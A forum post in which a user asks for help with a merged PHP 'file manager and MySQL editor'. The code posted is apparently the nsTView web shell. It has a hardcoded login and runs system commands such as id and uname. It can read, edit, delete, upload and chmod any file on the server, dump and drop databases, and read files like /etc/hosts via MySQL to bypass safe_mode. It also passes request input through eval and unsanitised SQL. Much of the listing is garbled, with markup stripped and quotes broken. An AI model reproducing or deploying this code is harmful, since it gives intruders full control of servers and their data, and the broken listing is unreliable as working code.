Hi. I tried to join 2 scripts ? filemanager and MySQL editor. I use the switch construction as menu. Both scripts work well as a standalone scripts, but when I joined them, the MySQL editor doesn?t work properly ? the option ?delete database?, ?Insert row?, ?Edit row? and ?Update? don?t work. Can somebody tell me where is the problem?
This is the joined script:
[php]<?
@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
error_reporting(E_ALL & ~E_NOTICE);
#####cfg#####
use password true / false
$create_password = true;
$password = “pass”; // default password
$pass=$_POST[‘pass’];
if($pass==$password){
$_SESSION[‘nst’]="$pass";
}
if ($_SERVER[“HTTP_CLIENT_IP”]) $ip = $_SERVER[“HTTP_CLIENT_IP”];
else if($_SERVER[“HTTP_X_FORWARDED_FOR”]) $ip = $_SERVER[“HTTP_X_FORWARDED_FOR”];
else if($_SERVER[“REMOTE_ADDR”]) $ip = $_SERVER[“REMOTE_ADDR”];
else $ip = $_SERVER[‘REMOTE_ADDR’];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION[‘nst’]) or $_SESSION[‘nst’]!=$password){
die("
Login to use
Login to use
Password:
Host: ".$_SERVER["HTTP_HOST"]."
IP: ".gethostbyname($_SERVER["HTTP_HOST"])."
Your ip: ".$ip."
|
");}
}
print "File Manager
BODY, TD, TR {
background-color: #C0C0C0;
text-decoration: none;
font-family: Verdana;
font-size: 8pt;
SCROLLBAR-FACE-COLOR: #363d4e;
SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
SCROLLBAR-SHADOW-COLOR: #363d4e;
SCROLLBAR-ARROW-COLOR: #363d4e;
SCROLLBAR-TRACK-COLOR: #808080
}
input, textarea, select {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: white;
border: solid 2px;
border-color: #808080
}
UNKNOWN {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:link {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:hover {
COLOR: #FF0C0B;
TEXT-DECORATION: none
}
A:active {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
";
if(@ini_get(“register_globals”)){$reg_g=“ON”;}else{$reg_g=“OFF”;}
if(@ini_get(“safe_mode”)){$safe_m=“ON”;}else{$safe_m=“OFF”;}
echo “”;
if($os==“unix”){ echo "
id: ".@exec('id')." |
uname -a: ".@exec('uname -a')." |
";}
print "
";
echo"
|
Your IP: [$ip] Server IP: [".gethostbyname($_SERVER["HTTP_HOST"])."] Server Hostdomain: [".$_SERVER["HTTP_HOST"]."]
[Safe mode: $safe_m] [Register globals: $reg_g]
[● Back]
[● Navigation]
[● MySQL]
|
";
if (!empty($_GET[‘ac’])) {$ac = $_GET[‘ac’];}
elseif (!empty($_POST[‘ac’])) {$ac = $_POST[‘ac’];}
else {$ac = “navigation”;}
switch($ac) {
case “sql”:
//START SQL
//echo (“SQL”);
$f = “sql_dump.txt”;
$f_d = $_GET[‘f_d’];
$php_self=$_SERVER[‘PHP_SELF’];
$delete_table=$_GET[‘delete_table’];
$tbl=$_GET[‘tbl’];
$from=$_GET[‘from’];
$to=$_GET[‘to’];
$adress=$_POST[‘adress’];
$port=$_POST[‘port’];
$login=$_POST[‘login’];
$pass=$_POST[‘pass’];
$adress=$_GET[‘adress’];
$port=$_GET[‘port’];
$login=$_GET[‘login’];
$pass=$_GET[‘pass’];
$conn=$_GET[‘conn’];
if(!isset($adress)){$adress=“localhost”;}
if(!isset($login)){$login=“root”;}
if(!isset($pass)){$pass=“alabala”;}
if(!isset($port)){$port=“3306”;}
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
function adds($editf){
#if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
#}
return $editf;
}
function adds2($editf){
if(get_magic_quotes_gpc()==0){
$editf=addslashes($editf);
}
return $editf;
}
if(!isset($f_d)){$f_d=".";}
if($f_d==""){$f_d=".";}
?>
<? if(!@$conn){ ?>
|
Host: |
|
Port: |
|
Login: |
|
Password: |
|
|
|
<?}?>
<? if(@$conn){ echo "PHP v".@phpversion()." mySQL v".@mysql_get_server_info()." ";}?>
|
|
<?
$ac = 'sql';
if($conn){
$serv = @mysql_connect($adress.":".$port, $login,$pass) or die("Error: ".mysql_error()."");
if($serv){$status="Connected. :: Log out";}else{$status="Disconnected.";}
print "Status: $status
";
print "
";
print " [db] ";
print "";
$res = mysql_list_dbs($serv);
while ($str=mysql_fetch_row($res)){
print "[DEL][DUMP] $str[0] ";
$tc++;
}
$baza=$_GET['baza'];
$db=$_GET['db'];
print "[Total db: $tc] ";
if($baza){
print "db: [$db]
";
$result=@mysql_list_tables($db);
while($str=@mysql_fetch_array($result)){
$c=mysql_query ("SELECT COUNT(*) FROM $str[0]");
$records=mysql_fetch_array($c);
if(strlen($str[0])>$s4ot){$s4ot=strlen($str[0]);}
if($records[0]=="0"){
print "[D][R][$records[0]] $str[0] ";
}else{
print "[D][R][$records[0]] $str[0] ";
}
mysql_free_result($c);
$total_t++;
}
print " Total tables: $total_t";
print "";
for($i=0; $i<$s4ot+10; $i++){print " ";}
print " ";
} #end baza
# delete table
if(isset($delete_table)){
mysql_select_db($_GET['db']) or die("".mysql_error()."");
mysql_query("DROP TABLE IF EXISTS $delete_table") or die("".mysql_error()."");
print " Table [ $delete_table ] :: Deleted successfuly!";
print "";
}
# end of delete table
# delete database
if(isset($_GET['delete_db'])){
mysql_drop_db($_GET['delete_db']) or die("".mysql_error()."");
print " Database ".$_GET['delete_db']." :: Deleted Successfuly!";
print "";
}
# end of delete database
// delete row
if(isset($_POST['delete_row'])){
$_POST['delete_row'] = base64_decode($_POST['delete_row']);
mysql_query("DELETE FROM ".$_GET['tbl']." WHERE ".$_POST['delete_row']) or die("".mysql_error()."");
$del_result = " Deleted successfuly! ".$_POST['delete_row'];
print "";
}
// end of delete row
$vn=$_GET['vn'];
print "
|
";
print "Database: $db => $vn";
// edit row
if(isset($_POST['edit_row'])){
$edit_row=base64_decode($_POST['edit_row']);
$r_edit = mysql_query("SELECT * FROM $tbl WHERE $edit_row") or die("".mysql_error()."");
print "
Row |
Value |
";
print "";
print "";
print " Update
Insert new
";
$i=0;
while($mn = mysql_fetch_array($r_edit, MYSQL_ASSOC)){
foreach($mn as $key =>$val){
$type = mysql_field_type($r_edit, $i);
$len = mysql_field_len($r_edit, $i);
$del .= "`$key`='".adds($val)."' AND ";
$c=strlen($val);
$val=htmlspecialchars($val, ENT_NOQUOTES);
$str=" $val ";
$buff .= "
$key ($type($len)) |
$str |
";
$i++;
}
}
$delstring=base64_encode($del);
print "";
print "$buff
";
print " ";
if(!$_POST['makeupdate']){print "";}
if($_POST['makeupdate']){
if($_POST['upd']=='update'){
preg_match_all("/name='(.*?)'scols=39srows=5>(.*?)/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',";
}
$total_str = substr_replace($total_str,"",-1);
$up_string = "UPDATE `$tbl` SET $total_str WHERE $delstring";
$up_string = htmlspecialchars($up_string, ENT_NOQUOTES);
print "PHP var: $sql="$up_string";
";
print "";
mysql_query($up_string) or die("".mysql_error()."");
}#end of make update
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'scols=39srows=5>(.*?)/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i<count($matches3[0]); $i++){
eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("".mysql_error()."");
print "PHP var: $sql="$make_insert";
";
print "";
}#end of insert
}#end of update
}
// end of edit row
// insert new line
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error()."");
print "
Insert new line in $tbl table
";
print "";
while ($new_line = mysql_fetch_array($qn, MYSQL_ASSOC)) {
foreach ($new_line as $key =>$next) {
$buff .= "$next ";
}
$expl=explode(" ",$buff);
$buff2 .= $expl[0]." ";
print "
$expl[0] ($expl[1]) |
|
";
unset($buff);
}
print "
";
if($_POST['mk_ins']){
preg_match_all("/(.*?)s/i",$buff2,$matches3);
for($i=0; $i<count($matches3[0]); $i++){
eval("$".$matches3[1][$i]." = "".adds2($_POST[$matches3[1][$i]])."";");
$total_str .= $matches3[1][$i]."='".adds2($_POST[$matches3[1][$i]])."',,";
}
$total_str = ",,".$total_str;
preg_match_all("/,(.*?)='(.*?)',/i",$total_str,$matches4);
for($i=0; $i<count($matches4[1]); $i++){
$matches4[1][0]=str_replace(",","",$matches4[1][0]);
$total_m_i .= "`".$matches4[1][$i]."`,";
$total_m_x .= "'".$matches4[2][$i]."',";
}
$total_m_i = substr($total_m_i, 0, strlen($total_m_i)-1);
$total_m_x = substr($total_m_x, 0, strlen($total_m_x)-1);
$make_insert="INSERT INTO `$tbl` ($total_m_i) VALUES ($total_m_x)";
mysql_query($make_insert) or die("".mysql_error()."");
print "PHP var: $sql="$make_insert";
";
print "";
}#end of mk ins
}
//end of ins new line
//rename table
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
print "
Rename $rename_table to
";
if(isset($_POST['new_name'])){
mysql_select_db($db) or die("".mysql_error()."");
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error()."");
print " Table $rename_table renamed to ".$_POST['new_name']."";
print "";
}
}
//end of rename
// dump table
if($_GET['dump']){
if(!is_writable($f_d)){die("
This folder $f_d isnt writable! Cannot make dump.
You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter
");}
mysql_select_db($db) or die("".mysql_error()."");
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db ) Table ( $tbl )
# --- eof ---
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error()."");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;rn");
$row[1]=str_replace("n","rn",$row[1]);
fwrite($fp, $row[1].";rnrn");
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');rn";
fwrite($fp, $sql);
}
}
fclose($fp);
print "";
}
//end of dump
// db dump
if($_GET['dump_db']){
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print "
Dump database $db";
}else{
print "
Cannot dump database. No tables exists in $db db.";
die;
}
if(sizeof($tabs)==0){
$res = mysql_query("SHOW TABLES FROM $db");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_row($res)){
$tabs[] .= $row[0];
}
}
}
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db )
# --- eof ---
");
foreach($tabs as $tab) {
fwrite($fp,"DROP TABLE IF EXISTS `$tab`;rn");
$res = mysql_query("SHOW CREATE TABLE `$tab`");
$row = mysql_fetch_row($res);
$row[1]=str_replace("n","rn",$row[1]);
fwrite($fp, $row[1].";rnrn");
$res = mysql_query("SELECT * FROM `$tab`");
if(mysql_num_rows($res)>0){
while($row=mysql_fetch_assoc($res)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = join("', '", $values);
$sql = "INSERT INTO `$tab`(`$keys`) VALUES ('$values');rn";
fwrite($fp, $sql);
}}
fwrite($fp, "rnrnrn");
}
fclose($fp);
print "";
}
//end of db dump
$vnutr=$_GET['vnutr'];
$tbl=$_GET['tbl'];
if($vnutr and !$_GET['ins_new_line']){
print "";
mysql_select_db($db) or die(mysql_error());
$c=mysql_query ("SELECT COUNT(*) FROM $tbl");
$cfa=mysql_fetch_array($c);
mysql_free_result($c);
print "
Total: $cfa[0]
From:
To:
[DOWNLOAD] [INSERT] [DUMP]
| ";
$vn=$_GET['vn'];
$from=$_GET['from'];
$to=$_GET['to'];
$from=$_GET['from'];
$to=$_GET['to'];
if(!isset($from)){$from=0;}
if(!isset($to)){$to=50;}
$query = "SELECT * FROM $vn LIMIT $from,$to";
$result = mysql_query($query);
$result1= mysql_query($query);
print $del_result;
print "
| ";
for ($i=0;$i<mysql_num_fields($result);$i++){
$name=mysql_field_name($result,$i);
$type = mysql_field_type($result, $i);
$len = mysql_field_len($result, $i);
print " $name ($type($len)) | ";
}
print "
";
while($mn = mysql_fetch_array($result, MYSQL_ASSOC)){
foreach($mn as $key=>$inside){
$buffer1 .= "`$key`='".adds($inside)."' AND ";
$b1 .= "".htmlspecialchars($inside, ENT_NOQUOTES)." | ";
}
$buffer1 = substr($buffer1, 0, strlen($buffer1)-5);
$buffer1 = base64_encode($buffer1);
print "
| rn";
print $b1;
print "";
unset($b1);
unset($buffer1);
}
mysql_free_result($result);
print "
";
} #end vnutr
print " |
";
} # end $conn
print "
|
";
die;
if($_GET['dump_download']){
header("Content-disposition: attachment; filename="$f";");
header("Content-length: ".filesize($f_d."/".$f));
header("Expires: 0");
readfile($f_d."/".$f);
if(is_writable($f_d."/".$f)){
unlink($f_d."/".$f);
}
die;
}
break;
//END SQL
case "navigation":
//START NAVIGATION
$images=array(".gif",".jpg",".png",".bmp",".jpeg");
$whereme=getcwd();
@$d=@$_GET['d'];
$php_self=@$_SERVER['PHP_SELF'];
if(@eregi("/",$whereme)){$os="unix";}else{$os="win";}
if(!isset($d)){$d=$whereme;}
$d=str_replace("\","/",$d);
if(@$_GET['img']=="1"){
@$e=$_GET['e'];
header("Content-type: image/gif");
readfile("$d/$e");
}
if(@$_GET['getdb']=="1"){
header('Content-type: application/plain-text');
header('Content-Disposition: attachment; filename=nst-mysql-damp.htm');
}
print "Navigation
BODY, TD, TR {
background-color: #C0C0C0;
text-decoration: none;
font-family: Verdana;
font-size: 10pt;
SCROLLBAR-FACE-COLOR: #363d4e;
SCROLLBAR-HIGHLIGHT-COLOR: #363d4e;
SCROLLBAR-SHADOW-COLOR: #363d4e;
SCROLLBAR-ARROW-COLOR: #363d4e;
SCROLLBAR-TRACK-COLOR: #808080
}
input, textarea, select {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: white;
border: solid 2px;
border-color: #808080
}
UNKNOWN {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:link {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:hover {
COLOR: #FF0C0B;
TEXT-DECORATION: none
}
A:active {
COLOR: #0006DE;
TEXT-DECORATION: none
}
A:visited {
TEXT-DECORATION: none
}
";
print "
0";
$expl=explode("/",$d);
$coun=count($expl);
if($os=="unix"){echo " / ";}
else{
echo "$expl[0]/";}
for($i=1; $i<$coun; $i++){
@$xx.=$expl[$i]."/";
$sls="$expl[$i]/";
$sls=str_replace("//","/",$sls);
$sls=str_replace("/'>/","/'>",$sls);
print $sls;
}
$mkdir=$_GET['mkdir'];
if($mkdir){
print " Create Folder in $d :
New folder name:
";
if($_POST['dir_n']){
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "Directory created successfuly! You will be redirected in a few seconds.";
}
die;
}
$mkfile=$_GET['mkfile'];
if($mkfile){
print " Create file in $d :
File name:
";
if($_POST['file_n']){
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "File created successfuly! You will be redirected in a few seconds.";
}
die;
}
$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "
Read file content using MySQL - when safe_mode, open_basedir is ON
(example: /etc/hosts)
";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error()."");
mysql_create_db("tmp_bd_file") or die("".mysql_error()."");
mysql_select_db("tmp_bd_file") or die("".mysql_error()."");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error()."");
mysql_query("LOAD DATA INFILE "".addslashes($read_file)."" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("".mysql_error()."");
print "File content:
";
for($i=0;$i$col_value) {
print htmlspecialchars($col_value)." ";}}
mysql_free_result($result);
mysql_drop_db("tmp_bd_file") or die("".mysql_error()."");
}
die;
}#end of read_file_safe_mode
# sys
$wich_f=$_GET['wich_f'];
$delete=$_GET['delete'];
$del_f=$_GET['del_f'];
$chmod=$_GET['chmod'];
$ccopy_to=$_GET['ccopy_to'];
// delete file
if(@$_GET['del_f']){
if(!isset($delete)){
print "Delete this file?
$d/$wich_f
Yes / No
";}
if($delete==1){
unlink($d."/".$del_f);
print "File: $d/$del_f DELETED!
You will be redirected i a few seconds.
# BACK
";
}
exit;
}
// Copy file to
if($ccopy_to){
$wich_f=$_POST['wich_f'];
$to_f=$_POST['to_f'];
print "Copy file:
$d/$ccopy_to
File:
To:
";
if($to_f){
@copy($wich_f,$to_f) or die("Cannot copy!!! maybe folder is not writable");
print "Copy success!!! ";
}
exit;
}
//Set Permissions
if(@$_GET['chmod']){
$perms = @fileperms($d."/".$wich_f);
print "CHMOD file $d/$wich_f
This file chmod is ";
print perm($perms);
print "
";
$chmd=<<<HTML
CHMOD (File Permissions) |
Permission |
Owner |
Group |
Other |
|
Read |
|
|
|
Write |
|
|
|
Execute |
|
|
|
Octal: |
|
|
|
= |
Symbolic: |
|
|
|
= |
|
HTML;
print "".$chmd."
$d/$wich_f
";
$t_total=$_POST['t_total'];
if($t_total){
chmod($d."/".$wich_f,$t_total);
print " Now chmod is $t_total
";
print "# BACK
";
}
exit;
}
# rename
if(@$_GET['rename']){
print "RENAME $d/$wich_f ?
RENAME $wich_f
TO
";
@$rto=$_POST['rto'];
if($rto){
$fr1=$d."/".$wich_f;
$fr1=str_replace("//","/",$fr1);
$to1=$d."/".$rto;
$to1=str_replace("//","/",$to1);
rename($fr1,$to1);
print "File $wich_f Renamed to $rto
";
echo "";
}
exit;
}
if(@$_GET['yes']=="yes"){
$d=@$_GET['d']; $e=@$_GET['e'];
unlink($d."/".$e);
$delresult="Success $d/$e deleted ";
}
if(@$_GET['clean']=="1"){
@$e=$_GET['e'];
$x=fopen("$d/$e","w");
fwrite($x,"");
echo "";
exit;
}
if(@$_GET['e']){
$d=@$_GET['d'];
$e=@$_GET['e'];
$pinf=pathinfo($e);
if(in_array(".".@$pinf['extension'],$images)){
echo "";
exit;}
$filename="$d/$e";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$e;
$de=str_replace("//","/",$de);
if(is_file($de)){
if(!is_writable($de)){echo "READ ONLY ";}}
echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy] ";
echo "
File contents:
$de
";
if(@$_GET['delete']=="1"){
$delete=$_GET['delete'];
echo "
DELETE: Are you sure?
Yes || No
";
if(@$_GET['yes']=="yes"){
@$d=$_GET['d']; @$e=$_GET['e'];
echo $delresult;
}
if(@$_GET['no']){
echo "
";
}
} #end of delete
exit;
} #end of e
if(@$_GET['edit']=="1"){
@$d=$_GET['d'];
@$ef=$_GET['ef'];
$e=$ef;
if(is_file($d."/".$ef)){
if(!is_writable($d."/".$ef)){echo "READ ONLY ";}}
echo "[Delete] [Edit] [Filesize to 0 byte] [Replace text in file] [Download] [Rename] [CHMOD] [Copy] ";
$filename="$d/$ef";
$fd = @fopen ($filename, "r");
$c = @fread ($fd, @filesize ($filename));
$c=htmlspecialchars($c);
$de=$d."/".$ef;
$de=str_replace("//","/",$de);
echo "
Edit:
$de ";
if(!@$_POST['save']){
print "
$c
";
}
if(@$_POST['save']){
$editf=@$_POST['editf'];
if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
$editf=stripslashes($editf);
}
$f=fopen($filename,"w+");
fwrite($f,"$editf");
echo "
File edited.
";
exit;
}
exit;
}
print " |
";
echo"
CREATE NEW: * Folder * * File *
Read file if safe mode is On
File upload:* Mass upload *
Filename |
Options |
Size |
Owner/Group |
Permissions |
";
$dirs=array();
$files=array();
$dh = @opendir($d) or die("Permission Denied or Folder/Disk does not exist
|
");
while (!(($file = readdir($dh)) === false)) {
if ($file=="." || $file=="..") continue;
if (@is_dir("$d/$file")) {
$dirs[]=$file;
}else{
$files[]=$file;
}
sort($dirs);
sort($files);
$fz=@filesize("$d/$file");
}
function perm($perms){
if (($perms & 0xC000) == 0xC000) {
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
$info = 'p';
} else {
$info = 'u';
}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
for($i=0; $i<count($dirs); $i++){
$perms = @fileperms($d."/".$dirs[$i]);
$owner = @fileowner($d."/".$dirs[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$dirs[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$info=perm($perms);
if($i%2){$color="#C0C0C0";}else{$color="#D1D1D1";}
$linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
$linkd=str_replace("//","/",$linkd);
echo "
0 $linkd |
DIR |
|
$owner/$group |
$info |
";
}
for($i=0; $i<count($files); $i++){
$size=@filesize($d."/".$files[$i]);
$perms = @fileperms($d."/".$files[$i]);
$owner = @fileowner($d."/".$files[$i]);
if($os=="unix"){
$fileownera=posix_getpwuid($owner);
$owner=$fileownera['name'];
}
$group = @filegroup($d."/".$files[$i]);
if($os=="unix"){
$groupinfo = posix_getgrgid($group);
$group=$groupinfo['name'];
}
$info=perm($perms);
if($i%2){$color="#D1D1D1";}else{$color="#C0C0C0";}
if ($size < 1024){$siz=$size.' b';
}else{
if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
}}}
echo "
2 $files[$i]
|
[options]
|
$siz |
$owner/$group |
$info |
";
}
echo "
";
if(@$_POST['uploadf']){
$where=$_POST['where'];
$newf=$_POST['newf'];
$where=str_replace("//","/",$where);
if($newf==""){$newf=$_FILES['text']['name'];}else{$newf=$newf;}
$uploadfile = "$where/".$newf;
if (@move_uploaded_file(@$_FILES['text']['tmp_name'], $uploadfile)) {
$uploadfile=str_replace("//","/",$uploadfile);
echo "
Uploaded to $uploadfile";
}else{
echo "
Error";}
}
if($_GET['download']){
$download=$_GET['download'];
header("Content-disposition: attachment; filename="$download";");
readfile("$d/$download");
exit;}
break;
//END NAVIGATION
case "massupload":
if(@$_GET['t']=="massupload"){
echo "
Mass upload:
";
if(@$_POST['massupload']){
$where=@$_POST['where'];
$uploadfile1 = "$where/".@$_FILES['text1']['name'];
$uploadfile2 = "$where/".@$_FILES['text2']['name'];
$uploadfile3 = "$where/".@$_FILES['text3']['name'];
$uploadfile4 = "$where/".@$_FILES['text4']['name'];
$uploadfile5 = "$where/".@$_FILES['text5']['name'];
$uploadfile6 = "$where/".@$_FILES['text6']['name'];
$uploadfile7 = "$where/".@$_FILES['text7']['name'];
$uploadfile8 = "$where/".@$_FILES['text8']['name'];
$uploadfile9 = "$where/".@$_FILES['text9']['name'];
$uploadfile10 = "$where/".@$_FILES['text10']['name'];
if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile1";}
if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile2";}
if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile3";}
if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile4";}
if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile5";}
if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile6";}
if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile7";}
if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile8";}
if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile9";}
if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
$where=str_replace("\\","\",$where);
echo "
Uploaded to $uploadfile20";}
}
exit;}
break;
}
?>[/php]